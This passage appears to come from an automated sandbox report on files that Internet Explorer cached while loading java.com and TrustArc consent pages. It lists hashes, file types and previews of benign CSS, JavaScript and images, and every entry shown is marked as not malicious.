lte\|\|""==lte?s.linkTrackEvents="None":s.linkTrackEvents=lte;var s_prop33="Version06032013",s_server=location.hostname,s_eVar35=location.href;s_eVar35=(s_eVar35=s_eVar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\print[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	804
Entropy (8bit):	5.112445136333023
Encrypted:	false
SSDEEP:	12:+qAyjfRR4ZN3A7JCHWX3d+yFrYaOzekBBsuDJ/cOYuOYgIWxnoDmZ2aLAob:FreBYJCm3RZI+YbEZ0aJ
MD5:	4F4FA7F6D2D8B440E06729E428EF16B1
SHA1:	B20A0C9A0FF94FA896ABEEEF26033291EAB959A9
SHA-256:	852B5C251CE5A304159750A6493E562C2E30AEC62C47C9549AD9B7D3D4D2CAE6
SHA-512:	A645D8DB979033C4E84E7066B5F8BB9791FC90942B8E3D4347928B85E7FFFA4DAD376CC7F2AC2F8CDBD7F6D32F60BF4502A35DCCAEF8ED8F364F70EE3F771E38
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/css/print.css
Preview:	body{line-height:1.5;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;color:#000;background:0;font-size:10pt}.container{background:0}hr{background:#ccc;color:#ccc;width:100%;height:2px;margin:2em 0;padding:0;border:0}hr.space{background:#fff;color:#fff}h1,h2,h3,h4,h5,h6{font-family:"Helvetica Neue",Arial,"Lucida Grande",sans-serif}code{font:.9em "Courier New",Monaco,Courier,monospace}img{float:left;margin:1.5em 1.5em 1.5em 0}a img{border:0}p img.top{margin-top:0}blockquote{margin:1.5em;padding:1em;font-style:italic;font-size:.9em}.small{font-size:.9em}.large{font-size:1.1em}.quiet{color:#999}.hide{display:none}a:link,a:visited{background:transparent;font-weight:700;text-decoration:underline}a:link:after,a:visited:after{content:" (" attr(href) ") ";font-size:90%}.jvf0,.jvh0{display:none}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\render[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	exported SGML document, UTF-8 Unicode text
Category:	downloaded
Size (bytes):	3922
Entropy (8bit):	5.033296563341562
Encrypted:	false
SSDEEP:	96:vb2Lm3CaOFVyvB4Ex0+m0YyMPt7xAQ5MiQwbGBOb7cDDts6J:TN4c9rEF7xqwbG4b7cftsq
MD5:	1E621F239F2EF351D86D5E41C75126EF
SHA1:	FBA636F058780CD43C981DFAB65BCF40499D5C26
SHA-256:	86AC00A8DCFBEC6B2013EEA74A851C1FBC8FE6BB128F746293744A9DE7162196
SHA-512:	475432796F0CFE3219E525DEECF5825284E328C492715CE5A322272E99EF5A4090E4FD83E02FE7FD2B01248770C2692E265C58279B0E6611B8FD79328995C543
Malicious:	false
IE Cache URL:	https://www.java.com/_compdelivery/_cache_0933/JCOM-Footer_Detail/assets/render.js
Preview:	/*. Copyright (c) 2019 Oracle and/or its affiliates. All rights reserved.. * Licensed under the Universal Permissive License v 1.0 as shown at http://oss.oracle.com/licenses/upl.. /./ globals define,console */.define([.."jquery",.."mustache",.."marked",.."text!./layout.html".], function ($, Mustache, Marked, templateHtml) {.."use strict";...// Content Layout constructor function...function ContentLayout(params) {...this.contentItemData = params.contentItemData \|\| {};...this.scsData = params.scsData;...this.contentClient = params.contentClient;..}...// Helper function to format a date field by locale...function dateToMDY(date) {...if (!date) {....return "";...}....var dateObj = new Date(date);....var options = {....year: "numeric",....month: "long",....day: "numeric",....hour: "2-digit",....minute: "2-digit"...};...var formattedDate = dateObj.toLocaleDateString("en-US", options);....return formattedDate;..}...// Helper function to parse markdown text...function parseMarkdown(mdText

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\require[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	17793
Entropy (8bit):	5.215395984599636
Encrypted:	false
SSDEEP:	384:6vCwvGiN5cMU8QatLePlko998VpSAIgujHrEDO11yy1qlMW2IP4VldNJ:0G7MU8qPlko998PhIg0HrEDM1yy1qlR2
MD5:	E9342BC1D3266232090154892C0637D3
SHA1:	AF6E361DC1E0EABD7AA52E8C0BBA133C60E5E388
SHA-256:	8D4B8FCEDCB0B6181A85C79254CDF85F7B97ABFCBA9DD51C93C308C9835FDEA9
SHA-512:	7B8D96A8A2F82125FBDD162A37E7B4ADAE474931F9BCDDEFAA1911D35147BBAA32CF3350C92363D1194505F7A6DDF72A961A907A6926F7EBAC7F37F9D5304D18
Malicious:	false
IE Cache URL:	https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/require.js
Preview:	/** vim: et:ts=4:sw=4:sts=4. * @license RequireJS 2.3.6 Copyright jQuery Foundation and other contributors.. * Released under MIT license, https://github.com/requirejs/requirejs/blob/master/LICENSE. /.var requirejs,require,define;(function(global,setTimeout){var req,s,head,baseElement,dataMain,src,interactiveScript,currentlyAddingScript,mainScript,subPath,version="2.3.6",commentRegExp=/\/\[\s\S]?\\/\|([^:"'=]\|^)\/\/.$/gm,cjsRequireRegExp=/[^.]\srequire\s$\s["']([^'"\s]+)["']\s*$/g,jsSuffixRegExp=/\.js$/,currDirRegExp=/^\.\//,op=Object.prototype,ostring=op.toString,hasOwn=op.hasOwnProperty,isBrowser=!("undefined"==typeof window\|\|"undefined"==typeof navigator\|\|!window.document),isWebWorker=!isBrowser&&"undefined"!=typeof importScripts,readyRegExp=isBrowser&&"PLAYSTATION 3"===navigator.platform?/^complete$/:/^(complete\|loaded)$/,defContextName="_",isOpera="undefined"!=typeof opera&&"[object Opera]"===opera.toString(),contexts={},cfg={},globalDefQueue=[],useInteractive=!1;function

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\trustarc-logo-small[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 198 x 34, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	4197
Entropy (8bit):	7.949279468766667
Encrypted:	false
SSDEEP:	96:cf2qaUvpL7qZRfYj76vPQ77VizJQyAcP7/IEPGD83nJ7rW0F1u2:cvtWRy76XQ7HFcPEvDOJ2n2
MD5:	01E1B7108FA9F6B54F403309A1616588
SHA1:	E3328418159B7371B64A6CFF199B2812C4D0B9C1
SHA-256:	91C4A6C4295F8889E8B04339A4A2C2E86D5EEF71BA808164E641D0D8A6435004
SHA-512:	EC6E3C4220F6675023674AAFEE3BF13C330028E7AB33333B757294575AD4002E890D7E7FDEE35D94E6388C2472413AFF2CB5B0A9B21CD0E19D0577A7B530BBA2
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/images/trustarc-logo-small.png
Preview:	.PNG........IHDR......."......N......sRGB.........IDATx..\.x.E...........V......!..+..DI....Q..Z%.......uU.]5.b.(B.uQ....P.C%.`""..@...z..K^..Q.N..........D^.4.i....O...<.x..4.i.....p...v...,..L")...H.W.h)i.UH.")ZI![..$A...>..U>....W.............1fU......A.!.%..R..S...#.h7.t....'.#4....K.&.,=d{..i..h..cp.G.8.EY.....Ak..^....q.6..\..XFI..n.;\h..4P.4P.1.7^]...}..Z...v.M..Z....@..%O.....9.f..JK.\| ...c.#..o..^.E..].!...#GF5h.@N.>..Nt..v...3.".v.,..2.~H.i..#..s..$.1..]GG,&g..A./h.=........B.3<..i`.a....6...o....M..&.8...s.=.!.F!...U01...i.v.t.,.e....Q..O..o..<...&..).c......~.....7V..U=....P.1...n<....\|].e.d.C..~.\.f...Y.d.(.4.S#....u5.mkN.d.o.....Q.P.$$$\.....~...9sr...rFyy9O.N.4.@...y.y..].v.mM+...,.....il.......\|.o...R7=...........!...V@.../11q.pl.GKeh...l.r...).U..}Q..PG...?I'...e.j......P\|.`w.......~..A..0...y...._....Q.p....@..<x..s.f.H.l[...y3.j..gz.\|.C..."....$77w..-.S..ftt.}...{.....t.5.<y...cV.m\R...<...s.]7.*;9.......p..}..q...T..!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\6.cache[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	6754
Entropy (8bit):	5.52043569064115
Encrypted:	false
SSDEEP:	96:w3heoyuHEv2znAv3HfcjT5ChdLhvFiCWVA+u0VDf0QyD0Nu0AlJ7bU0S1ObL:idEG63E0hdNNZWVA+3ByDkWz/L
MD5:	1839FD3E8B89C5E4674F2F5320183B90
SHA1:	296B613425ABE91C57792EDDFC1C444DB3EAF196
SHA-256:	9EBD1BCE8F64BAD3C33692061797D87B35C3ADE8604EB1121E32234967427151
SHA-512:	B9AE473B65B53FF9DFC3E34CED08311DC4C95DBA4DA2256D2BE5ED6B10A072DE9D20846E822F8B5560EB82C7678481D87FB663EACBA84955E40D0F36B589E9EA
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/defaultpreferencemanager/deferredjs/67B873F492AD87C25B322202223D7A22/6.cache.js
Preview:	function Kt(){}.function vrb(){}.function frb(a){this.b=a}.function irb(a){this.b=a}.function mrb(a){this.b=a}.function prb(a){this.b=a}.function srb(a){this.b=a}.function yrb(a){this.b=a}.function Btb(a){this.b=a}.function Gv(a){throw new Tu(a)}.function Ddb(a,b){Cdb();a.Ke(a.Ce()+b)}.function YMb(a,b){ZMb(a,Dgc,(yv(),Fv(b)))}.function Cdb(){Cdb=R5b;yt((xt(),xt(),wt))}.function yt(a){!a.b&&(a.b=new Kt);return a.b}.function oi(b,a){b.setDate(a);return b.getTime()}.function ri(a,b,c,d,e,f,g){return new Date(a,b,c,d,e,f,g)}.function Uu(a){bk(this);this.g=!a?null:Sh(a);this.f=a}.function kt(a){it();var b,c;b=yt((xt(),xt(),wt));c=null;a==b&&(c=gw(ht.pg(Mlc),77));if(!c){c=new jt(Mlc);a==b&&ht.qg(Mlc,c)}return c}.function Fv(b){yv();var c;if(b==null){throw new bWb}if(b.length==0){throw new nVb('empty argument')}try{return Ev(b,true)}catch(a){a=YP(a);if(iw(a,11)){c=a;throw new Uu(c)}else throw a}}.function brb(a,b){spb.call(this,a);this.i=new CLb;d8(this,Qrb(new Rrb(this)));this.q=a;this.e=b;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\JavaAlice[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 125x132, frames 3
Category:	downloaded
Size (bytes):	3811
Entropy (8bit):	7.850192369179497
Encrypted:	false
SSDEEP:	96:YaKeVfWUtV7GNVz9Bu8Qydxh6zzvupXg8B:LfWUniNV5h6zzvYXg8B
MD5:	F26405E1D9347863352B5E7CEA270155
SHA1:	192894C813979D6ADB08BD2BECE0D0A5DEBFE96A
SHA-256:	70145461B9DD7661B2FDE95B572262B9A4AC4044FF9C4D99450A5B1CEC93A1CA
SHA-512:	94F753BA1F9E6512700DDAA6CD8559109C31B55C2A4B546A5708F75D5CADC175AF1CB438498FE62E94192EFC45B1F88097F4A27CC74340BCCD3EBF45FA12C6CC
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONT9D14685A7F0F4C7782D8B91D06E60E37/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	......JFIF.....d.d.....C..............................................!........."$".$.......C.........................................................................}..!........................................E..........................!....1Aq"3QRUVa.....246su...#$r...B.S...................................0.......................1..!A.Qa."q..#.......B.............?..J.:e..x...%.[m...8..NV.r.u.^O;.......o...N.'......i..y.u.c\|..Y....y.u.c\|.ry.p]}X.&.....w.._V7.'......i.....y.u.c\|.ry.p]}X.&.....w.._V7.'......i.....y.u.c\|.ry.p]}X.&...1....$w..";.(}-.-.h.....t.'hdU..'j....?n.o...[.T...........8..Gf..)>.j..zOed.:!.\..r.......;..qLT...........8..v_...f.....VOs....O./?.~....c.D.P.H.R..i..$a..m.+s.x..#......$o..Uu't..Bc...z.....<\|.!;.:#<=OySe..e.R......N.k.h..f..$#.<.........u.A.e.E......\.Q...#.....88.."..........R}........tCb.i!2.JQ.E..O@.....oN^e.Q?.DEl....dxMz~..I.>...\R...s.!.\)K.c.... k...&M...q....N.^pn%j..ki.';..[4.Q........^....n.b[.t\..7

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\Oracleacademy(2)[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 125x132, frames 3
Category:	downloaded
Size (bytes):	4900
Entropy (8bit):	7.90049937566647
Encrypted:	false
SSDEEP:	96:XLElCYEO3u1fQ8i0id8UIu3HOwqi/PxbCvGTGK9Q5Sr0gwFC7ofJK:X4lCYEYu148fyuwr0v8ZGpFSofJK
MD5:	CFE0F1B70C44984498BCBB32E3913E28
SHA1:	4C71674AB77C183746263886A86051DD6DC7C3DB
SHA-256:	3A09A1B1EA0D785CA29174C25AF6F42656831898E9B09FC0B2AFB25A5E82A068
SHA-512:	58B02CF5537D7776468D010992589A57B64DA47ABEF45FD92F83A3423366E5C94D48903216A10A6401634FD7C0E2047D8DE4A014BD258414250675E6E252C56B
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONT862DE06B4B724C38B1F5D3FA3EB08BFB/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	......JFIF.............C..............................................!........."$".$.......C.........................................................................}..!.........................................X...........................!1...."AQaq...#25BSUt.....$RTbrs.......%3C......467Dcu.....................................3.........................!.1Q.A..."BSTq.......a..............?..v..<....1.R]e......1.I+a.K.1.5.......X.S..M,.x.u..:=4.....7....K;.;..c}N.M,.x.u..:........X.S..K;.;..c}N.=4.....7....N....X.S.$....w.%.[:v.k...\d..g..u0\..O.y..."5...k9...Q...Q...p;..q@qj.j.V.s...c............%>^.@w...k.n.b..[..u..1..j.)&.A.%..."V..nO.&+%.1...i.....4.0....ZY.*?f.v....4..4.E.Q@.P..WN_5M.N...Ls.m'..Q<... U...cm....:......`....{...(G.....%K..Z..t...)..iI.$...O....\..vk.=.e.s.....8...z..@.i....$..+.,..@........'....B.6.A.6.4.HD.....a.s.A..hQ.e.=..U3`.pfz..2Tw.IASJDD..J....9q..r......7[f..7gK...1...o....%......+a.-9.d'.Z.^g^."T..;[...y..9..N?

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\controller[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	29779
Entropy (8bit):	5.384616840808838
Encrypted:	false
SSDEEP:	384:2tAXfo1yc8Z4n7hR0RQRRVVZxWJTSF1sR1ECaZq4kzer/JKva3M:Nbc8Z47zacVVZ8i1sReAHt
MD5:	4E7A74127C680C9953242315466999E9
SHA1:	E25BC8DA188D9D69A3A3276F4E834F871C8B2F7E
SHA-256:	E27E66F37F0DE43B16DB3E9D60D0D3E537C09E55C84D19B2E42BA63308795478
SHA-512:	3AA848EED23083121972B5F864E3402BCA05BA93CC32DC9E0AFC1A8E59B31EB55B122F5493F423EE6043F1991A8D9F4EDC29B5E22EE84157173767F0CD080D26
Malicious:	false
IE Cache URL:	https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/controller.js
Preview:	"use strict";var SCS=window.SCS\|\|{};SCS.sitePrefix=SCS.sitePrefix\|\|"/",SCS.data={pageId:null,siteInfo:null,structure:null,structurePages:null,basePageModel:null,baseSlotReuseModel:null,pageModel:null,pageLayout:null,mobileLayout:null,navMap:{},navRoot:null,placeholderContent:null,startProgressTimer:null,pageTimeoutTimer:null},SCS.performance={timers:{}},SCS.xmlhttp=new XMLHttpRequest,Array.isArray\|\|(Array.isArray=function(e){return"[object Array]"===Object.prototype.toString.call(e)}),String.prototype.trim\|\|(String.prototype.trim=function(){return this.replace(/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,"")}),String.prototype.startsWith\|\|(String.prototype.startsWith=function(e,t){return t=t\|\|0,this.substr(t,e.length)===e}),SCS.preInitRendering=SCS.preInitRendering\|\|function(){},SCS.initRendering=function(){this.data.startProgressTimer=setTimeout(this.onStartProgress,2500),this.data.pageTimeoutTimer=setTimeout(this.onPageTimeout,3e4),this.setCacheKeys(),this.processSitePrefix(),this.isPrerende

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\header[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	117
Entropy (8bit):	4.339316892918074
Encrypted:	false
SSDEEP:	3:FnXKP6jJGAJqjwba3fEVRVJTt8VJfB8JHBV:FnXKPmJpa30RN8VJZqv
MD5:	7C75E3C13ECB36C435F0DBB588121F1E
SHA1:	786BDF8C01C423B57F3E32FE4EDFA6BAB8E609A5
SHA-256:	47FC7E24694B95D777E8DD251A1DC715C0E92EA0DE35873C5790F776FE34C7BA
SHA-512:	2FD948BC233EBEACD28380CDCEBE5BB8AA039931BFEC2F9ACD89AFAE83B9DD76CD69E6FD46B0E52CCD29458900EF26120854168BDB285D4D4093148CCE012B89
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/translations/header.js
Preview:	define({root:!0,de:!0,es:!0,fr:!0,it:!0,ja:!0,ko:!0,nl:!0,pl:!0,"pt-BR":!0,ru:!0,sv:!0,tr:!0,"zh-CN":!0,"zh-TW":!0});

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\header[2].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	56
Entropy (8bit):	4.322381431056328
Encrypted:	false
SSDEEP:	3:FnW0CfpAGjgeJnTH+aHI:FnTCfJEeNTzHI
MD5:	D49AB4376BCF767AA505976C21CE99FB
SHA1:	67A54CA68A46E20B1081EAE5B36B6396DAB55D5A
SHA-256:	EA733AF2869543FF1CD17BC8F77F5CE7BFC0C76EA801EC8B0B92F727B29AC797
SHA-512:	998FE632B2B73034C622A7AEDE7735E79F3ED7F9E0B6C87046298B8FCD1D6C6F08546999A027ABA6A2E6E01D97775D8C520A67BC281EDAE956B80FEE3C200D7A
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/translations/root/header.js
Preview:	define({select_lang:"Select Language",Search:"Search"});

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\items[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	7214
Entropy (8bit):	5.647875097933699
Encrypted:	false
SSDEEP:	192:9q0XkZ4JddBzuclksHEqpK5lf35hS5hf5hO5h4Y:g0xJddtFlksHEWK5lf3PSPfPOP4Y
MD5:	DE149FC4558B3C853E30AABCE0DC7F56
SHA1:	2F7B55A7D6F62F63CF2760B93FFCA5BE04F373BB
SHA-256:	8C9344A56407F0903D36DC274EBBD3D33D7014DB50BE118687F5F2D21661A6D7
SHA-512:	89CA9A98A46A7D19057D43E50E6A2BF4B6D8826C708BF643031D2997822FB63913F257763EBCFA297B12D39A5DDA53947264362E93B17E7EF42524427B17C3B6
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/items?q=((id%20eq%20"COREEACA6644ABED46228A54322C5E14161D"%20or%20id%20eq%20"CORE1CE64AD7F2E944B68F223DEBB0AF616A")%20and%20(language%20eq%20"en"))&channelToken=1f7d2611846d4457b213dfc9048724dc&cb=_cache_97bc
Preview:	{"hasMore":false,"offset":0,"count":2,"limit":2,"items":[{"translatable":true,"createdDate":{"value":"2020-05-18T21:48:54.443Z","timezone":"UTC"},"name":"Home content","description":"","language":"en","links":[{"href":"https://orasites-prodapp.cec.ocp.oraclecloud.com/content/published/api/v1.1/items/COREEACA6644ABED46228A54322C5E14161D","rel":"self","method":"GET","mediaType":"application/json"}],"id":"COREEACA6644ABED46228A54322C5E14161D","updatedDate":{"value":"2021-04-22T20:08:16.263Z","timezone":"UTC"},"type":"JCOM_SimplePage","fields":{"omniture":null,"keywords":["java","downloads","software","java runtime","jre","java download","download java"],"Webreference":null,"addBodyTags":" Begin SiteCatalyst code version: G.5. --> <script language=\"JavaScript\" type=\"text/javascript\"> var s_channel = \"javac:Home\"; var s_pageName = \"javac:Homepage\"; var s_prop19 = \"en_javac:Homepage\"; var s_prop20 = \"Home_Pages\"; // var s_prop21 = \"180X150-728X90\"; var s_prop21 = \"180X

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\jv0dl_a[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 672 x 128, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	4741
Entropy (8bit):	7.853820287173857
Encrypted:	false
SSDEEP:	96:ySDZ/I09Da01l+gmkyTt6Hk8nTKwD1IBxaf/76744xn+LGDDTmIiQceDrr7k:ySDS0tKg9E05TlD1Uwf/76744oyaIvf0
MD5:	A6BE3E959427A5B5645356CBE0DFCF51
SHA1:	818B4E71DACA0CA889B0714935A159E91C2F1B25
SHA-256:	EEC8393557E19987E71F13592A34E39119CA17F5AC554974B937B437AA7DDC58
SHA-512:	D7C9467FE6DDE7CA9B93F266F10BB0591B23F0E518BD35251A8DB08E33C3F43A9A5BBC0BDE8AD677E657A45352076D24FF789D0272B6001385EB37B158F91554
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/home/jv0dl_a.png
Preview:	.PNG........IHDR.............[mL.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+.....x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D...A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\jv0h[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS4 Macintosh, datetime=2011:01:25 18:25:40], baseline, precision 8, 777x95, frames 3
Category:	downloaded
Size (bytes):	33382
Entropy (8bit):	7.450231632805739
Encrypted:	false
SSDEEP:	768:aFZ3oEM+kcnJbKMY24ibgwJOEtW73o79d3SP:eZ3oiJd6wJOj7QbY
MD5:	3AAFB427F71A50D3D6BDFFA76ABA4380
SHA1:	E8D483CFB9DAB0446C89666FF12A8B8E1F97CA6D
SHA-256:	F8E752CEAE01AF6482D110260838F393C84B8D822E53D9E24BE8D3EFCB57651E
SHA-512:	13DFBE537B2AC5654C2DF5F673BDB4E1CC9E54FBE457C4A05921433C1D50E45FC559C6419DB21F56071FAB9AF41ADB6B9F6B3E272B029919D1A0EFA74DF49A5B
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/header/jv0h.jpg
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS4 Macintosh.2011:01:25 18:25:40......................................_...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..V....ljo.l7.k..............;.......[&..z..u{.{...m....c}...8.5.2....<msK..P..2.;k.c.7......}U. H......2........{..A7.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\loading[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 31 x 31
Category:	downloaded
Size (bytes):	2608
Entropy (8bit):	7.212558742538955
Encrypted:	false
SSDEEP:	48:opmEwU9deVtdpwUCiesszQwUCivxn3wUCivjvwUCiPF3BZBwUyysnjUTROL:orwmcdpwfBsszQwfSx3wfSjvwf4FRnwj
MD5:	394BAFC3CC4DFB3A0EE48C1F54669539
SHA1:	5640EA4D0EBA1C390F587EC69463C9A5196B7FA2
SHA-256:	EB7CFD3D959B2E09C170F532E29F8B825F9BC770B2279FDE58E595617753E244
SHA-512:	A2B86BFEBA74FEAE3247C1C53BBC4C4D922936BC099FA8D8487B20AD0B699EC5D279A94F972BA478000CBF4053BA08FFBB2CA5BA82EE01B680F5033B148BBD69
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/images/loading.gif
Preview:	GIF89a................................................................666&&&PPP...ppp...VVV...hhhFFF......HHH222..........................................................................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!.......,...........@.pH......b.$..tx@$.W@e..8>S...-k.\.'<\0.f4..`...../..yXg{.w.Q.o..X.........h...Dd....a....e.Ty..vky.BVe..vC..p..y..C.yFp..Q.pGpP.C.pHp..pIp....pJ......e......X.......e.....p...X....%.ia6....'_S$.jt...EY.<..M..z..h..*AY. ....I8..q...J6c.....N..8/...f...s......!.......,...........@.pH......P ...tx@$.W...8L......'...p.0g...B.h..ew....f.!.Q.mx[.........[... .Dbd...j..x....B..iti...BV[..tC.......f..C.....c..C...gc..D....c.......c.......[...cL...cM...cN..[O...fPba..lB.-.N.....!..t....."..`Q...$}..`.........b..J,{.q.G.....V.....x.I....:A..!.......,...........@.pH......P ...tx@$.W...8L......'...p.0g...B.h..ew....fusD.mx[.........[e.iCbd...j...X.T..jif^.V[..tC..[...f..C.fFc..Q.[Gc..D.cHc...cIc..B.cJ..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\notice[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	9027
Entropy (8bit):	5.40985819837725
Encrypted:	false
SSDEEP:	192:57TGITdVKY0G1R8GbSM7MF1fpem4T2J1tvFnj1E6mnNUy3c8:BGS971R8GbSM3T2JFnj6NUy3c8
MD5:	68D31E97572528100371F837AF8603F5
SHA1:	9FEF653E0EF4BC5AF642CDAB7E8ECD486F821FF8
SHA-256:	5D21BBDC017320D093CFCF73892F099F99868910D131A37E7C324BC428684F97
SHA-512:	69BC641294AD5C1657369AB4C748BB0201F7309499205C40BB29341238198943439E246647F6D8BA9FAAB332AF7A3FB7C346B093ACE462046AD147645E460C3B
Malicious:	false
Preview:	function _truste_eumap(){truste=self.truste\|\|{};truste.eu\|\|(truste.eu={});truste.util\|\|(truste.util={});.(new Image(1,1)).src=("https://consent.trustarc.com/log".replace("http:","https:"))+"?domain=oracle.com&country=ch&state=&behavior=expressed&c="+(((1+Math.random())65536)\|0).toString(16).substring(1);.truste.util.error=function(l,h,k){k=k\|\|{};var j=h&&h.toString()\|\|"",e=k.caller\|\|"";if(h&&h.stack){j+="\n"+h.stack.match(/(@\|at)[^\n\r\t]/)[0]+"\n"+h.stack.match(/(@\|at)[^\n\r\t]*$/)[0].}truste.util.trace(l,j,k);if(truste.util.debug\|\|!h&&!l){return}var d={apigwlambdaUrl:"https://api-js-log.trustarc.com/error",enableJsLog:false};.if(d.enableJsLog){delete k.caller;delete k.mod;delete k.domain;delete k.authority;k.msg=l;var i=new (self.XMLHttpRequest\|\|self.XDomainRequest\|\|self.ActiveXObject)("MSXML2.XMLHTTP.3.0");.i.open("POST",d.apigwlambdaUrl,true);i.setRequestHeader&&i.setRequestHeader("Content-type","application/json");.i.send(truste.util.getJSON({info:truste.util.getJSON(k)\|\|"",erro

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\notice[2].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	9027
Entropy (8bit):	5.40985819837725
Encrypted:	false
